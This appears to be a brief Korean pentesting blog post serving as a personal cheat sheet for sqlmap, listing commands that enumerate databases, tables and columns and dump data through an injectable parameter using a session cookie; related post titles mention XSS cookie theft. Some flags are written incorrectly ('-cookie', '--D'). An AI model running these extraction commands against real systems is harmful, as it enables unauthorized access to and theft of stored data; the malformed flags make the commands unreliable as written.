의미없는 블로그
[Tools] sqlmap 사용하기 본문
안쓰니까 맨날 까먹는 sqlmap
취약 포인트 찾았으면 DB 부터 조회해본다~
sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --dbs
만약에 POST 면 --data="[파라미터]" 이거 추가해주면 될듯
DB 고르고 테이블 조회하기
sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" -D [DB명] --tables
특정 테이블의 컬럼 조회하기
sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --columns
데이터 보려면
sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --dump
sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] -C [컬럼명] --dump
'# 나 > pentest (WEB)' 카테고리의 다른 글
| 싱글쿼터 없이 Stored XSS 시나리오 (쿠키 탈취) (0) | 2019.12.05 |
|---|---|
| 싱글쿼터 없이 Stored XSS 시나리오 (notepad.exe 실행) (0) | 2019.12.04 |
| 의식의 흐름 기법 (0) | 2019.11.19 |
| 백업 및 임시파일 / 디렉터리 리스팅 (1) | 2019.11.19 |
| 구글링 모듬구이 (0) | 2019.11.18 |
'# 나/pentest (WEB)' Related Articles
more
Comments